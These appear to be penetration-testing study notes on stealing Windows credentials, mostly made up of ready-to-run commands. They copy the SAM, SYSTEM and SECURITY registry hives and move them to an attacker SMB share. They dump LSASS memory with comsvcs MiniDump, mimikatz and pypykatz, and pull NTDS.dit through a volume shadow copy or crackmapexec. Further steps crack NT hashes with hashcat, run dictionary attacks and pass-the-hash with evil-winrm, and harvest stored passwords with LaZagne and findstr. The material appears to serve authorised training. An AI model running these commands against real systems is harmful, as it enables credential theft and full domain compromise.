# Windows Local Password Attacks ## Attacking SAM With access to a non-domain joined Windows system, we may benefit from attempting to quickly dump the files associated with the SAM database to transfer them to our attack host and start cracking hashes offline. Doing this offline will ensure we can continue to attempt our attacks without maintaining an active session with a target. Let's walk through this process together using a target host. ### **Copying SAM Registry Hives** There are three registry hives that we can copy if we have local admin access on the target; each will have a specific purpose when we get to dumping and cracking the hashes. Here is a brief description of each in the table below: | Registry Hive | Description | | --------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------- | | `hklm\sam` | Contains the hashes associated with local account passwords. We will need the hashes so we can crack them and get the user account passwords in cleartext. | | `hklm\system` | Contains the system bootkey, which is used to encrypt the SAM database. We will need the bootkey to decrypt the SAM database. | | `hklm\security` | Contains cached credentials for domain accounts. We may benefit from having this on a domain-joined Windows target. | We can create backups of these hives using the `reg.exe` utility. Launching `cmd.exe` as admin: ```batch reg.exe save hklm\sam C:\sam.save reg.exe save hklm\system C:\system.save reg.exe save hklm\security C:\security.save ``` Technically we will only need `hklm\sam` & `hklm\system`, but `hklm\security` can also be helpful to save as it can contain hashes associated with cached domain user account credentials present on domain-joined hosts. Lets transfer them (this is only one possible method): ### **Creating a Share with smbserver.py** On Kali linux, there's a symlink to a script that simplifies using impacket: ```bash sudo impacket-smbserver -smb2support CompData /home/ltnbob/Documents/ ``` otherwise it can be manually found here: ```bash sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/ ``` * `CompData` Share name * `/home/ltnbob/Documents` Target folder * `-smb2support` ensures newer SMB support ```batch move sam.save \\10.10.15.16\CompData move security.save \\10.10.15.16\CompData move system.save \\10.10.15.16\CompData ``` ### Dumping Hashes with Impacket's secretsdump.py Again, on Kali Linux we have a shortcut: ```bash sudo impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL ``` Notice the first step secretsdump executes is targeting the `system bootkey` before proceeding to dump the `LOCAL SAM hashes`. It cannot dump those hashes without the boot key because that boot key is used to encrypt & decrypt the SAM database, which is why it is important for us to have copies of the registry hives we discussed earlier in this section. Notice at the top of the secretsdump.py output: ```shell-session Dumping local SAM hashes (uid:rid:lmhash:nthash) ``` This tells us how to read the output and what hashes we can crack. Most modern Windows operating systems store the password as an NT hash. Operating systems older than Windows Vista & Windows Server 2008 store passwords as an LM hash, so we may only benefit from cracking those if our target is an older Windows OS. Knowing this, we can copy the NT hashes associated with each user account into a text file and start cracking passwords. It may be beneficial to make a note of each user, so we know which password is associated with which user account. ### Cracking Hashes with Hashcat awk command to save the nt hashes ```bash awk '{ split($0, arr, ":"); print arr[4]; }' userhashlist.txt ``` ```bash sudo hashcat -m 1000 userhashlist.txt /usr/share/wordlists/rockyou.txt ``` (rockyou.txt is usually compressed in Kali Linux, you need to extract it) Having the passwords could be useful to us in many ways. We could attempt to use the passwords we cracked to access other systems on the network. It is very common for people to re-use passwords across different work & personal accounts. Knowing this technique, we covered can be useful on engagements. We will benefit from using this any time we come across a vulnerable Windows system and gain admin rights to dump the SAM database. {% hint style="info" %} Keep in mind that this is a well-known technique, so admins may have safeguards to prevent and detect it. We can see some of these ways [documented](https://attack.mitre.org/techniques/T1003/002/) within the MITRE attack framework. {% endhint %} ### Remote Dumping & LSA Secrets Considerations With access to credentials with `local admin privileges`, it is also possible for us to target LSA Secrets over the network. This could allow us to extract credentials from a running service, scheduled task, or application that uses LSA secrets to store passwords. or [NetExec](https://www.netexec.wiki/) ```bash crackmapexec smb --local-auth -u -p --lsa ``` We can also dump hashes from the SAM database remotely. ```bash crackmapexec smb --local-auth -u -p --sam ``` ### Mimikatz hash dump Launch mimikatz then ``` privilege::debug sekurlsa::logonpasswords ``` ## Attacking LSASS In addition to getting copies of the SAM database to dump and crack hashes, we will also benefit from targeting LSASS. LSASS is a critical service that plays a central role in credential management and the authentication processes in all Windows operating systems.
Upon initial logon, LSASS will: * Cache credentials locally in memory * Create [access tokens](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-tokens) * Enforce security policies * Write to Windows [security log](https://docs.microsoft.com/en-us/windows/win32/eventlog/event-logging-security) Let's cover some of the techniques and tools we can use to dump LSASS memory and extract credentials from a target running Windows. ### Dumping LSASS Process Memory **Task Manager Method**
A file called `lsass.DMP` is created and saved in: ```cmd-session C:\Users\loggedonusersdirectory\AppData\Local\Temp ``` **Rundll32.exe & Comsvcs.dll Method** Before issuing the command to create the dump file, we must determine what process ID (`PID`) is assigned to `lsass.exe`. This can be done from cmd or PowerShell (in order): ```batch tasklist /svc ``` ```powershell Get-Process lsass ``` Then to dump: ```powershell rundll32 C:\windows\system32\comsvcs.dll, MiniDump C:\lsass.dmp full ``` Recall that most modern AV tools recognize this as malicious and prevent the command from executing. In these cases, we will need to consider ways to bypass or disable the AV tool we are facing. AV bypassing techniques are outside of the scope of this module. ### Using Pypykatz to Extract Credentials Once we have the dump file on our attack host, we can use a powerful tool called [pypykatz](https://github.com/skelsec/pypykatz) to attempt to extract credentials from the .dmp file. ```bash pypykatz lsa minidump /home/peter/Documents/lsass.dmp ``` * `lsa` in the command because LSASS is a subsystem of `local security authority` * specify the data source as a `minidump` Useful information in the output: * [MSV](https://docs.microsoft.com/en-us/windows/win32/secauthn/msv1-0-authentication-package) is an authentication package in Windows that LSA calls on to validate logon attempts against the SAM database. * `WDIGEST` is an older authentication protocol enabled by default in `Windows XP` - `Windows 8` and `Windows Server 2003` - `Windows Server 2012`. LSASS caches credentials used by WDIGEST in clear-text. * [Kerberos](https://web.mit.edu/kerberos/#what_is) is a network authentication protocol used by Active Directory in Windows Domain environments. Domain user accounts are granted tickets upon authentication with Active Directory. This ticket is used to allow the user to access shared resources on the network that they have been granted access to without needing to type their credentials each time. LSASS `caches passwords`, `ekeys`, `tickets`, and `pins` associated with Kerberos. It is possible to extract these from LSASS process memory and use them to access other systems joined to the same domain. * The Data Protection Application Programming Interface or [DPAPI](https://docs.microsoft.com/en-us/dotnet/standard/security/how-to-use-data-protection) is a set of APIs in Windows operating systems used to encrypt and decrypt DPAPI data blobs on a per-user basis for Windows OS features and various third-party applications. Mimikatz and Pypykatz can extract the DPAPI `masterkey` for the logged-on user whose data is present in LSASS process memory. This masterkey can then be used to decrypt the secrets associated with each of the applications using DPAPI and result in the capturing of credentials for various accounts.\\ **Cracking the NT Hash with Hashcat** Same as above: ```bash sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt ``` ## Attacking Windows Credential Manager ### Windows Vault and Credential Manager [Credential Manager](https://learn.microsoft.com/en-us/windows-server/security/windows-authentication/credentials-processes-in-windows-authentication#windows-vault-and-credential-manager) is a feature built into Windows since `Server 2008 R2` and `Windows 7`. Thorough documentation on how it works is not publicly available, but essentially, it allows users and applications to securely store credentials relevant to other systems and websites. Credentials are stored in special encrypted folders on the computer under the user and system profiles ([MITRE ATT\&CK](https://attack.mitre.org/techniques/T1555/004/)): * `%UserProfile%\AppData\Local\Microsoft\Vault\` * `%UserProfile%\AppData\Local\Microsoft\Credentials\` * `%UserProfile%\AppData\Roaming\Microsoft\Vault\` * `%ProgramData%\Microsoft\Vault\` * `%SystemRoot%\System32\config\systemprofile\AppData\Roaming\Microsoft\Vault\` Each vault folder contains a `Policy.vpol` file with AES keys (AES-128 or AES-256) that is protected by DPAPI. These AES keys are used to encrypt the credentials. Newer versions of Windows make use of `Credential Guard` to further protect the DPAPI master keys by storing them in secured memory enclaves ([Virtualization-based Security](https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs)). Microsoft often refers to the protected stores as `Credential Lockers` (formerly `Windows Vaults`). Credential Manager is the user-facing feature/API, while the actual encrypted stores are the vault/locker folders. The following table lists the two types of credentials Windows stores: | Name | Description | | ------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Web Credentials | Credentials associated with websites and online accounts. This locker is used by Internet Explorer and legacy versions of Microsoft Edge. | | Windows Credentials | Used to store login tokens for various services such as OneDrive, and credentials related to domain users, local network resources, services, and shared directories. |
It is possible to export Windows Vaults to `.crd` files either via Control Panel or with the following command. Backups created this way are encrypted with a password supplied by the user, and can be imported on other Windows systems. ```cmd-session C:\Users\sadams>rundll32 keymgr.dll,KRShowKeyMgr ```
### Enumerating credentials with cmdkey We can use [cmdkey](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey) to enumerate the credentials stored in the current user's profile: ```cmd-session C:\Users\sadams>whoami srv01\sadams C:\Users\sadams>cmdkey /list Currently stored credentials: Target: WindowsLive:target=virtualapp/didlogical Type: Generic User: 02hejubrtyqjrkfi Local machine persistence Target: Domain:interactive=SRV01\mcharles Type: Domain Password User: SRV01\mcharles ``` Stored credentials are listed with the following format: | Key | Value | | ----------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------- | | Target | The resource or account name the credential is for. This could be a computer, domain name, or a special identifier. | | Type | The kind of credential. Common types are `Generic` for general credentials, and `Domain Password` for domain user logons. | | User | The user account associated with the credential. | | Persistence | Some credentials indicate whether a credential is saved persistently on the computer; credentials marked with `Local machine persistence` survive reboots. | The first credential in the command output above, `virtualapp/didlogical`, is a generic credential used by Microsoft account/Windows Live services. The random looking username is an internal account ID. This entry may be ignored for our purposes. The second credential, `Domain:interactive=SRV01\mcharles`, is a domain credential associated with the user SRV01\mcharles. `Interactive` means that the credential is used for interactive logon sessions. Whenever we come across this type of credential, we can use `runas` to impersonate the stored user like so: ```cmd-session C:\Users\sadams>runas /savecred /user:SRV01\mcharles cmd Attempting to start cmd as user "SRV01\mcharles" ... ```
### Extracting credentials with Mimikatz There are many different tools that can be used to decrypt stored credentials. One of the tools we can use is [mimikatz](https://github.com/gentilkiwi/mimikatz). Even within `mimikatz`, there are multiple ways to attack these credentials - we can either dump credentials from memory using the `sekurlsa` module, or we can manually decrypt credentials using the `dpapi` module. For this example, we will target the LSASS process with `sekurlsa`: ```cmd-session C:\Users\Administrator\Desktop> mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::credman ...SNIP... Authentication Id : 0 ; 630472 (00000000:00099ec8) Session : RemoteInteractive from 3 User Name : mcharles Domain : SRV01 Logon Server : SRV01 Logon Time : 4/27/2025 2:40:32 AM SID : S-1-5-21-1340203682-1669575078-4153855890-1002 credman : [00000000] * Username : mcharles@inlanefreight.local * Domain : onedrive.live.com * Password : ...SNIP... ...SNIP... ``` Note: Some other tools which may be used to enumerate and extract stored credentials included [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI), [LaZagne](https://github.com/AlessandroZ/LaZagne), and [DonPAPI](https://github.com/login-securite/DonPAPI). ## Attacking Active Directory & NTDS.dit How we can extract credentials through the use of a `dictionary attack against AD accounts` and `dumping hashes` from the `NTDS.dit` file.
Once a Windows system is joined to a domain, it will `no longer default to referencing the SAM database to validate logon requests`. ### Dictionary Attacks against AD accounts using CrackMapExec Keep in mind that a dictionary attack is essentially using the power of a computer to guess a username &/or password using a customized list of potential usernames and passwords. It can be rather `noisy` (easy to detect) to conduct these attacks over a network because they can generate a lot of network traffic and alerts on the target system as well as eventually get denied due to login attempt restrictions that may be applied through the use of [Group Policy](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh831791\(v=ws.11\)). When we find ourselves in a scenario where a dictionary attack is a viable next step, we can benefit from trying to `custom tailor` our attack as much as possible. Example of possible usernames, could help from OSINT. | Username Convention | Practical Example for Jane Jill Doe | | ----------------------------------- | ----------------------------------- | | `firstinitiallastname` | jdoe | | `firstinitialmiddleinitiallastname` | jjdoe | | `firstnamelastname` | janedoe | | `firstname.lastname` | jane.doe | | `lastname.firstname` | doe.jane | | `nickname` | doedoehacksstuff | Often, an email address's structure will give us the employee's username (structure: username\@domain). For example, from the email address `jdoe`@`inlanefreight.com`, we see that `jdoe` is the username. {% hint style="info" %} A tip from MrB3n: We can often find the email structure by Googling the domain name, i.e., “@inlanefreight.com” and get some valid emails. From there, we can use a script to scrape various social media sites and mashup potential valid usernames. Some organizations try to obfuscate their usernames to prevent spraying, so they may alias their username like a907 (or something similar) back to joe.smith. That way, email messages can get through, but the actual internal username isn’t disclosed, making password spraying harder. Sometimes you can use google dorks to search for “inlanefreight.com filetype:pdf” and find some valid usernames in the PDF properties if they were generated using a graphics editor. From there, you may be able to discern the username structure and potentially write a small script to create many possible combinations and then spray to see if any come back valid. {% endhint %} We can manually create our list(s) or use an `automated list generator` such as the Ruby-based tool [Username Anarchy](https://github.com/urbanadventurer/username-anarchy) to convert a list of real names into common username formats. ```bash ./username-anarchy -i /home/ltnbob/names.txt ``` **Launching the Attack with CrackMapExec** ```shell-session crackmapexec smb 10.129.201.57 -u bwilliamson -p /usr/share/wordlists/fasttrack.txt ``` #### What is left behind It can be useful to know what might have been left behind by an attack. Knowing this can make our remediation recommendations more impactful and valuable for the client we are working with. On any Windows operating system, an admin can navigate to `Event Viewer` and view the Security events to see the exact actions that were logged. Once we have discovered some credentials, we could proceed to try to gain remote access to the target domain controller and capture the NTDS.dit file. ### Capturing NTDS.dit `NT Directory Services` (`NTDS`) is the directory service used with AD to find & organize network resources. Recall that `NTDS.dit` file is stored at `%systemroot%/ntds` on the domain controllers in a [forest](https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/using-the-organizational-domain-forest-model). This is the primary database file associated with AD and stores all domain usernames, password hashes, and other critical schema information. If this file can be captured, we could potentially compromise every account on the domain similar to the technique we covered in this module's `Attacking SAM` section. ### Connecting to a DC ```bash evil-winrm -i 10.129.201.57 -u bwilliamson -p 'P@55w0rd!' ``` **Checking Local Group Membership** Once connected, we can check to see what privileges `bwilliamson` has. We can start with looking at the local group membership using the command: ```powershell net localgroup ``` We are looking to see if the account has local admin rights. To make a copy of the NTDS.dit file, we need local admin (`Administrators group`) or Domain Admin (`Domain Admins group`) (or equivalent) rights. We also will want to check what domain privileges we have. ```powershell net user bwilliamson ``` **Creating Shadow Copy of C:** We can use `vssadmin` to create a [Volume Shadow Copy](https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service) (`VSS`) of the C: drive or whatever volume the admin chose when initially installing AD. It is very likely that NTDS will be stored on C: as that is the default location selected at install, but it is possible to change the location. We use VSS for this because it is designed to make copies of volumes that may be read & written to actively without needing to bring a particular application or system down. ```powershell vssadmin CREATE SHADOW /For=C: ``` **Copying NTDS.dit from the VSS** ```shell-session cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit ``` You can move this file in many ways, one of which was presented in [#attacking-sam](#attacking-sam "mention") **A Faster Method: Using cme to Capture NTDS.dit** ```bash crackmapexec smb 10.129.201.57 -u bwilliamson -p P@55w0rd! --ntds ``` ### Cracking Hashes & Gaining Credentials usual NT hashes procedure, either a file or single one: ```shell-session sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt ``` ### Pass-the-Hash Considerations Useful if cannot crack the hash A PtH attack takes advantage of the [NTLM authentication protocol](https://docs.microsoft.com/en-us/windows/win32/secauthn/microsoft-ntlm) to authenticate a user using a password hash. Instead of `username`:`clear-text password` as the format for login, we can instead use `username`:`password hash`. Here is an example of how this would work: ```bash evil-winrm -i 10.129.201.57 -u Administrator -H "64f12cddaa88057e06a81b54e73b949b" ``` ## Credential harvesting in Windows ### Search Centric Here are some helpful key terms we can use that can help us discover some credentials: | | | | | ------------- | ------------ | ----------- | | Passwords | Passphrases | Keys | | Username | User account | Creds | | Users | Passkeys | Passphrases | | configuration | dbcredential | dbpassword | | pwd | Login | Credentials | We can start by using Windows search We can also take advantage of third-party tools like [Lazagne](https://github.com/AlessandroZ/LaZagne) to quickly discover credentials that web browsers or other installed applications may insecurely store. It would be beneficial to keep a [standalone copy](https://github.com/AlessandroZ/LaZagne/releases/) of Lazagne on our attack host so we can quickly transfer it over to the target ```batch start lazagne.exe all ``` This will execute Lazagne and run `all` included modules. We can include the option `-vv` to study what it is doing in the background. Once we hit enter, it will open another prompt and display the results. Using findstr We can also use [findstr](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/findstr) to search from patterns across many types of files. Keeping in mind common key terms, we can use variations of this command to discover credentials on a Windows target: ```cmd-session findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml ``` *** Here are some other places we should keep in mind when credential hunting: * Passwords in Group Policy in the SYSVOL share * Passwords in scripts in the SYSVOL share * Password in scripts on IT shares * Passwords in web.config files on dev machines and IT shares * unattend.xml * Passwords in the AD user or computer description fields * KeePass databases --> pull hash, crack and get loads of access. * Found on user systems and shares * Files such as pass.txt, passwords.docx, passwords.xlsx found on user systems, shares, [Sharepoint](https://www.microsoft.com/en-us/microsoft-365/sharepoint/collaboration) ## CrackMapExec Replacement